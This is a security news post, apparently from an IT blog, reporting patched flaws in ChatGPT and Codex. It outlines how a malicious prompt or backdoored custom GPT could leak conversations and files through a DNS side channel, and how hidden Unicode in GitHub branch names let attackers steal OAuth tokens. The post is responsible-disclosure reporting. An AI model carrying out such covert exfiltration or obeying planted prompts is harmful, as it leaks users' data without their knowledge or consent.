top of page

OpenAI Patches ChatGPT Data Exfiltration and Codex GitHub Token Vulnerabilities

  • Mar 30
  • 4 min read

Key Findings


  • Check Point discovered a critical vulnerability in ChatGPT that allowed attackers to exfiltrate user data, uploaded files, and conversation history without detection or consent

  • The flaw exploited a hidden DNS-based communication channel in the Linux runtime environment, bypassing all visible AI guardrails

  • OpenAI patched the ChatGPT vulnerability on February 20, 2026, with no evidence of malicious exploitation

  • BeyondTrust Phantom Labs identified a command injection vulnerability in OpenAI's Codex that allowed attackers to steal GitHub OAuth tokens using hidden Unicode characters in branch names

  • The Codex flaw affected the ChatGPT website, Codex SDK, and developer extensions, potentially compromising entire enterprise repositories

  • OpenAI addressed the Codex vulnerability through a hotfix on December 23, 2025, and implemented stronger protections by February 5, 2026


Background


OpenAI's ChatGPT and Codex have become integral tools in both consumer and enterprise environments, with users uploading increasingly sensitive information for analysis and code generation. These AI systems are designed with multiple security layers to prevent unauthorized data sharing and direct outbound network requests. However, the discoveries by Check Point and BeyondTrust revealed fundamental gaps in how these platforms isolate data and validate user input, raising concerns about the default security posture of AI systems handling sensitive enterprise data.


ChatGPT Data Exfiltration Through DNS Side Channel


Check Point researchers uncovered a vulnerability that weaponized the Linux runtime environment used by ChatGPT for code execution and data analysis. Rather than attacking the AI model directly, the flaw exploited a hidden DNS-based communication path that existed at the infrastructure level. By encoding information into DNS requests, attackers could bypass ChatGPT's safeguards, which operated under the assumption that the execution environment was completely isolated and incapable of sending data outward.


The vulnerability could be triggered through a single malicious prompt, turning an ordinary conversation into a covert exfiltration channel. A backdoored custom GPT could silently harvest user messages and uploaded files without any warning or user approval dialog. The lack of visible data transfer warnings meant the leakage remained largely invisible from the user's perspective.


Attack Delivery Methods


Attackers could exploit this vulnerability through multiple vectors. The simplest approach involved convincing users to paste a malicious prompt by framing it as a way to unlock premium features or improve ChatGPT's performance. A more sophisticated vector involved embedding the malicious logic directly into custom GPTs, where it would execute automatically without requiring any user action beyond launching the tool.


The threat was particularly acute for enterprise environments where employees might unknowingly interact with compromised custom GPTs created by threat actors or distribute them throughout an organization.


Codex Command Injection and GitHub Token Theft


The Codex vulnerability stemmed from improper input sanitization when processing GitHub branch names during task execution. BeyondTrust researchers discovered that attackers could inject arbitrary commands through the branch name parameter by exploiting a Unicode character known as an Ideographic Space. This special character appears as a normal space to the human eye but allowed hidden commands to execute in the background.


When developers viewed what appeared to be a standard branch named "main," malicious instructions could be running simultaneously. The system would then force Codex to reveal secret GitHub OAuth tokens in plain text, giving attackers the same credential access that Codex used to authenticate with GitHub repositories.


Scale and Impact of Codex Vulnerability


The flaw affected multiple attack surfaces including the ChatGPT website, Codex SDK, and various developer extensions. If an attacker modified a project's default branch to include the hidden Unicode injection, any developer opening the repository would have their credentials automatically exfiltrated. The compromised tokens provided attackers with full control over a developer's code repositories and, by extension, access to shared enterprise environments.


Beyond cloud-based attacks, researchers discovered that Codex stores sensitive login data locally in an auth.json file on developers' machines. An attacker with access to a developer's workstation could extract these tokens to move laterally through an entire organization's GitHub infrastructure, potentially compromising intellectual property and customer data across multiple repositories.


Response and Remediation Timeline


Check Point followed responsible disclosure practices and worked with OpenAI to address the ChatGPT vulnerability before public disclosure. OpenAI deployed a patch on February 20, 2026. For Codex, BeyondTrust reported the flaw on December 16, 2025, prompting OpenAI to release a hotfix one week later on December 23. The company continued hardening defenses and by January 30, 2026, had implemented stronger protections for shell commands and restricted token access. OpenAI formally classified the issue as a "Critical Priority 1" vulnerability on February 5, 2026, confirming fixes were complete.


Broader Security Implications


These vulnerabilities highlight a critical gap in AI security architecture. Both flaws exploited assumptions about data isolation and input validation that AI vendors took for granted. Security researchers emphasized that organizations cannot rely on AI tools being secure by default and must implement independent security layers to counter prompt injections and unexpected AI behavior.


The issues also coincided with reports of malicious browser extensions engaging in prompt poaching, silently siphoning ChatGPT conversations without user consent. Security experts warned that such extensions could enable identity theft, targeted phishing, and unauthorized access to intellectual property and customer data in enterprise settings.


Sources


  • https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html

  • https://hackread.com/openai-codex-vulnerability-steal-github-tokens/

  • https://letsdatascience.com/news/openai-patches-chatgpt-exfiltration-bug-and-codex-vulnerabil-1ea8b9ba

  • https://x.com/TheCyberSecHub/status/2038680989682348294

  • https://www.cypro.se/2026/03/30/openai-patches-chatgpt-data-exfiltration-flaw-and-codex-github-token-vulnerability/

Recent Posts

See All

Comments


  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page